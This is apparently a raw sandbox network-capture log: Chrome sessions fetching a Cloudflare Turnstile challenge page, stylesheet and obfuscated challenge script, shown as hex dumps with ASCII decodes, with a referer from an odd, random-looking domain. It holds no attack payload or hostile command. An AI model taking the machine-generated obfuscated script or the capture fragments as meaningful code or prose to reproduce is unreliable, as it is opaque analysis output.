                                                              2024-07-03 07:40:35 UTC1369INData Raw: 3f 53 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 3f 68 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 34 38 30 70 78 22 3a 68 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 34 36 30 70 78 22 2c 68 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 68 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 32 30 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 31 70 78 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 43 6f 6c 6f 72 3d 22 23 30 30 30 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 53 74 79 6c 65 3d 22 73 6f 6c 69 64 22 2c 68 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75
                                                              Data Ascii: ?S:"nonexistent")?h.style.height="480px":h.style.height="460px",h.style.position="absolute",h.style.zIndex="21474836420",h.style.borderWidth="1px",h.style.borderColor="#000",h.style.borderStyle="solid",h.style.backgroundColor="#ffffff",h.style.borderRadiu
                                                              2024-07-03 07:40:35 UTC1369INData Raw: 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 22 6c 69 6e 65 22 29 3b 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 2d 77 69 64 74 68 22 2c 22 33 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 22 2c 22 23 66 66 66 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 66 69 6c 6c 22 2c 22 6e 6f 6e 65 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 31 22 2c 22 36 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 32 22 2c 22 31 38 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 31 22 2c 22 31 38 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 32 22 2c
                                                              Data Ascii: ocument.createElementNS("http://www.w3.org/2000/svg","line");t.setAttribute("stroke-width","3"),t.setAttribute("stroke","#fff"),t.setAttribute("fill","none"),t.setAttribute("x1","6"),t.setAttribute("x2","18"),t.setAttribute("y1","18"),t.setAttribute("y2",


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.649737104.17.3.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:36 UTC790OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              sec-ch-ua-platform: "Windows"
                                                              Upgrade-Insecure-Requests: 1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: navigate
                                                              Sec-Fetch-Dest: iframe
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:36 UTC1362INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:40:36 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Content-Length: 79313
                                                              Connection: close
                                                              critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                              content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                              cross-origin-embedder-policy: require-corp
                                                              cross-origin-opener-policy: same-origin
                                                              document-policy: js-profiling
                                                              origin-agent-cluster: ?1
                                                              referrer-policy: same-origin
                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                              cross-origin-resource-policy: cross-origin
                                                              accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                              2024-07-03 07:40:36 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 39 64 35 33 61 37 35 39 65 63 38 30 63 62 34 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                              Data Ascii: Server: cloudflareCF-RAY: 89d53a759ec80cb4-EWRalt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:40:36 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                              2024-07-03 07:40:36 UTC1369INData Raw: 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20
                                                              Data Ascii: 00%; height: 100%; overflow: hidden;}body { margin: 0; background-color: #fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, blinkmacsystemfont,
                                                              2024-07-03 07:40:36 UTC1369INData Raw: 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 38 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c
                                                              Data Ascii: splay: flex; margin-right: 8px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both; stroke-width: 6px; stroke: #f8f8f8; stroke-miterl
                                                              2024-07-03 07:40:36 UTC1369INData Raw: 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 2c 20 2e 74 68 65 6d 65 2d 64 61 72
                                                              Data Ascii: ext a:hover,.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .cb-lb .cb-i { border: 2px solid #dadada; background-color: #222;}.theme-dark .cb-lb input:focus ~ .cb-i, .theme-dar
                                                              2024-07-03 07:40:36 UTC1369INData Raw: 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 0a 2e 74 68 65
                                                              Data Ascii: r: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited, .theme-dark #fr-helper-link:link,.the
                                                              2024-07-03 07:40:36 UTC1369INData Raw: 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 64 65 31 33 30 33 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 78 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 76
                                                              Data Ascii: #challenge-error-text { text-align: center; line-height: 10px; color: #de1303; font-size: 9px;}#challenge-overlay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-overlay a:link,#challenge-error-text a:v
                                                              2024-07-03 07:40:36 UTC1369INData Raw: 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 73 70 61 6e 2e 63 62 2d 6c 62 2d 74 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 62 61 63
                                                              Data Ascii: tion: underline;}.cb-lb input:focus ~ .cb-i { border: 2px solid #c44d0e;}.cb-lb input:focus ~ span.cb-lb-t { text-decoration: underline;}.cb-lb input:checked ~ .cb-i { transform: rotate(0deg) scale(1); opacity: 1; border-radius: 5px; bac
                                                              2024-07-03 07:40:36 UTC1369INData Raw: 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 31 36 70 78 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65
                                                              Data Ascii: top: 3px; margin-left: 0;}.size-compact #branding { display: flex; flex-flow: row-reverse wrap; place-content: center flex-start; align-items: center; margin: 5px 16px 0; padding-right: 0; text-align: right;}.size-compact #terms { te
                                                              2024-07-03 07:40:36 UTC1369INData Raw: 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 66 2d 73 74 61 67 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78
                                                              Data Ascii: er;}.rtl .size-compact #branding { padding-right: 0; padding-left: 0; text-align: center;}.rtl .size-compact #terms { text-align: center;}.rtl .size-compact #cf-stage { padding-right: 48px;}.rtl .size-compact #success-icon { left: 86px


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.649738104.17.3.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:36 UTC710OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d53a759ec80cb4 HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: script
                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:37 UTC331INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:40:37 GMT
                                                              Content-Type: application/javascript; charset=UTF-8
                                                              Content-Length: 206658
                                                              Connection: close
                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                              Server: cloudflare
                                                              CF-RAY: 89d53a7b9a9c42ea-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:40:37 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 7a 2c 66 46 2c 66 47 2c 66 4e 2c 66 54 2c 66 55 2c 67 6b 2c 67 6c 2c 67 70 2c 67 71 2c 67 75 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 2c 68 39 2c 68 61 2c 68 62 2c 68 63 2c 68 64 2c 68 65 2c 68 66 2c 68 67 2c 68 68 2c 68 69 2c 68 6a 2c 68 6b 2c 68 6c 2c 68 6d 2c 68 6e 2c 68 6f 2c 68 70 2c 68 71 2c 68 72 2c 68 74 2c 68 46 2c 68 53 2c
                                                              Data Ascii: window._cf_chl_opt.uaO=false;~function(iz,fF,fG,fN,fT,fU,gk,gl,gp,gq,gu,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h4,h5,h6,h7,h8,h9,ha,hb,hc,hd,he,hf,hg,hh,hi,hj,hk,hl,hm,hn,ho,hp,hq,hr,ht,hF,hS,
                                                              2024-07-03 07:40:37 UTC1369INData Raw: 44 2c 45 2c 46 29 7b 69 66 28 6a 4c 3d 69 7a 2c 6f 3d 7b 27 74 66 4c 5a 45 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 58 55 45 69 74 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 54 4b 64 66 63 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 5e 47 7d 2c 27 52 76 4c 42 69 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 72 72 48 6a 54 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 2c 4a 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 2c 4a 29 7d 2c 27 44 56 57 44 55 27 3a 6a 4c 28 31 31 37 30 29 2c 27 6c 46 61 76 66 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 70 70 46
                                                              Data Ascii: D,E,F){if(jL=iz,o={'tfLZE':function(G,H){return G<H},'XUEit':function(G,H){return G+H},'TKdfc':function(G,H){return H^G},'RvLBi':function(G,H){return G===H},'rrHjT':function(G,H,I,J){return G(H,I,J)},'DVWDU':jL(1170),'lFavf':function(G,H){return G+H},'ppF
                                                              2024-07-03 07:40:37 UTC1369INData Raw: 37 33 29 2c 27 76 57 42 77 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 27 73 51 45 5a 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 51 72 50 45 55 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 6f 7d 2c 27 74 4f 74 72 66 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 53 44 57 74 43 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 42 67 64 7a 49 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 7d 2c 6a 3d 4f 62 6a 65 63 74 5b 6a 4f 28 31 32 30 37 29 5d 28 68 29 2c 6b 3d 30 3b 69 5b 6a 4f 28 35 38 35 29 5d 28 6b 2c 6a 5b
                                                              Data Ascii: 73),'vWBwm':function(n,o){return n+o},'sQEZm':function(n,o){return n<o},'QrPEU':function(n,o){return n===o},'tOtrf':function(n,o){return n<o},'SDWtC':function(n,o){return o===n},'BgdzI':function(n,o){return n(o)}},j=Object[jO(1207)](h),k=0;i[jO(585)](k,j[
                                                              2024-07-03 07:40:37 UTC1369INData Raw: 3d 63 5b 6a 52 28 31 38 38 33 29 5d 28 66 2c 6a 52 28 31 34 39 31 29 29 29 7d 2c 65 29 7d 2c 66 46 5b 69 7a 28 32 30 32 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 6a 53 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 29 7b 6a 3d 28 6a 53 3d 69 7a 2c 69 3d 7b 7d 2c 69 5b 6a 53 28 31 32 37 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 43 2c 44 29 7b 72 65 74 75 72 6e 20 43 2b 44 7d 2c 69 5b 6a 53 28 32 33 38 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 43 2c 44 29 7b 72 65 74 75 72 6e 20 43 2b 44 7d 2c 69 5b 6a 53 28 31 33 38 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 43 2c 44 29 7b 72 65 74 75 72 6e 20 43 2b 44 7d 2c 69 5b 6a 53 28 32 30 31 33 29 5d 3d 6a 53 28 32 31 33 31 29 2c 69 5b 6a 53 28 36 33 33 29 5d 3d 6a 53 28 31 34 35 38 29 2c 69 5b 6a
                                                              Data Ascii: =c[jR(1883)](f,jR(1491)))},e)},fF[iz(2027)]=function(f,g,h,jS,i,j,k,l,m,n,o,s,x,B){j=(jS=iz,i={},i[jS(1278)]=function(C,D){return C+D},i[jS(2384)]=function(C,D){return C+D},i[jS(1385)]=function(C,D){return C+D},i[jS(2013)]=jS(2131),i[jS(633)]=jS(1458),i[j
                                                              2024-07-03 07:40:37 UTC1369INData Raw: 6f 3d 28 6f 3d 42 2e 68 5b 31 36 36 2e 39 34 5e 43 2e 67 5d 2c 73 3d 6a 5b 6a 54 28 31 31 36 33 29 5d 28 6f 5b 33 5d 2c 44 2e 6a 29 2c 6f 5b 33 5d 3d 6a 5b 6a 54 28 38 36 30 29 5d 28 73 2c 73 29 2a 35 38 39 33 32 2b 6a 5b 6a 54 28 38 36 30 29 5d 28 34 36 36 39 33 2c 73 29 2b 35 32 32 36 36 26 32 35 35 2c 45 2e 68 5b 6a 5b 6a 54 28 32 33 37 33 29 5d 28 46 2e 6a 2c 47 2e 67 29 5d 29 3b 74 72 79 7b 6f 5b 6a 54 28 39 31 36 29 5d 28 52 29 28 53 2e 6a 29 7d 63 61 74 63 68 28 76 29 7b 69 66 28 6f 3d 61 31 2e 68 5b 61 32 2e 67 5e 32 31 2e 33 34 5d 2c 30 3c 6f 5b 6a 54 28 31 32 36 34 29 5d 29 7b 69 66 28 61 39 2e 68 5b 61 61 2e 67 5e 31 38 33 2e 37 31 5d 3d 76 2c 73 3d 6f 5b 6a 54 28 31 34 30 32 29 5d 28 29 2c 6a 5b 6a 54 28 37 35 31 29 5d 28 2d 31 2c 73 29 29 74
                                                              Data Ascii: o=(o=B.h[166.94^C.g],s=j[jT(1163)](o[3],D.j),o[3]=j[jT(860)](s,s)*58932+j[jT(860)](46693,s)+52266&255,E.h[j[jT(2373)](F.j,G.g)]);try{o[jT(916)](R)(S.j)}catch(v){if(o=a1.h[a2.g^21.34],0<o[jT(1264)]){if(a9.h[aa.g^183.71]=v,s=o[jT(1402)](),j[jT(751)](-1,s))t
